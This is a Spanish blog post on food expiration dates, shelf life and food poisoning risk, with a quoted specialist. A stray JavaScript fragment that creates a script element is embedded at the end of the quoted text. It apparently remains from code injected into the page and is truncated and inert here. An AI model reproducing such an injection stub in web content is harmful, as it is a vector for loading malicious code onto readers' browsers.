Salud y belleza » Sin categoría

Extiende tu propia “fecha de vencimiento”

Sin Comentarios

Alimentos y hombre, ambos, poseen una fecha de vencimiento, por supuesto, a diferencia de los productos comestibles enlatados, el ser humano no cuenta con datos exactos, puntuales o estrictos sobre su biológico desenlace pero, aún así, lo repetimos, el hombre también tiene una plazo de caducidad, nos guste o no.

De hecho, la revisión de tales números representa, siempre, el dato fundamental a supervisar a la hora de comprar determinados alimentos (¡lo contrario ocurre con los hombres pues nadie anda intentando adivinar o pensando cuándo, cómo y dónde va a morir!).

Pero, ¿Qué es en verdad una fecha de vencimiento? ¿Acaso el alimento se descompone automáticamente de un instante a otro? ¿Hay diferencias entre tomar un producto cinco horas, por ejemplo, antes de su caducidad o es lo mismo que ingerirlo ya vencido?.

La fecha de caducidad de los alimentos es, tal cual su nombre lo indica, una recomendación obligatoria a tener en cuenta al momento de consumir el producto comprado y, si bien pasarse un día no se considera peligroso, no se recomienda.

Esto parece sencillo ¿Lo es?. Suena alarmante pero en España se contabilizan 15.000 casos de toxiinfecciones alimentarias anuales, casi todas ellas producidas por la ingesta de alimentos en mal estado debido a una imperfecta administración y conservación. Como vemos, aquello que es información básica, termina transformándose en información compleja para algunas personas.

Respetar las fechas de vencimiento no es una sugerencia, es una obligación, algo que se debe realizar sí o sí. “La denominada vida útil de un alimento es justamente una forma de indicar el tiempo o lapso que transcurre desde la elaboración del producto hasta su deterioro. Influyen factores como la temperatura, el oxígeno, la luz; todos ellos pueden hacer variar la vida del alimento. Cualquier agresión que pueda sufrir un alimento deben ser controlada mediante sistemas de conservación tales como la refrigeración o congelación, entre otras.

Así, el alimento puede conservarse en buen estado durante un período más o menos largo. Lo importante es, ante todo, revisar la fecha de vencimiento y luego acatar las reglas propias de la conservación de cada uno de los alimentos” confiesa un especialista y, no para asustarnos pero sí para advertirnos, agrega: “una intoxicación por ingerir alimentos en mal estado puede causarnos infinitos trastornos y, de hecho, en el caso de algunas carnes o alimentos enlatados, puede incluso perjudicar nuestro organismo de forma irreparable”.var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : , , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.